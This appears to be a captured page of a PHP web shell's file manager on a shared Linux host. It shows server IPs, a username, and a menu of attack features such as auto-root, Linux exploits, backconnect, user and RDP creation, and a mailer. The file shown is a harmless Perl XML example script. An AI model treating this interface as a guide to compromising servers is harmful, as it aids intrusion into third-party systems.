Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-parser-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
REC-xml-19980210.xml
155.62
KB
-rw-r--r--
canonical
2.77
KB
-rwxr-xr-x
canontst.xml
510
B
-rw-r--r--
ctest.dtd
71
B
-rw-r--r--
xmlcomments
684
B
-rwxr-xr-x
xmlfilter
6.25
KB
-rwxr-xr-x
xmlstats
3.36
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xmlcomments
#!/usr/bin/perl -w # # $Revision: 1.1.1.1 $ # # $Date: 2003-07-27 11:07:11 $ use XML::Parser; my $file = shift; die "Can't find file \"$file\"" unless -f $file; my $count = 0; my $parser = new XML::Parser( ErrorContext => 2, ParseParamEnt => 0 ); $parser->setHandlers( Comment => \&comments ); $parser->parsefile($file); print "Found $count comments.\n"; ################ ## End of main ################ sub comments { my ( $p, $data ) = @_; my $line = $p->current_line; $data =~ s/\n/\n\t/g; print "$line:\t<!--$data-->\n"; $count++; } # End comments # Tell Emacs that this is really a perl script # Local Variables: # mode:perl # End:
Close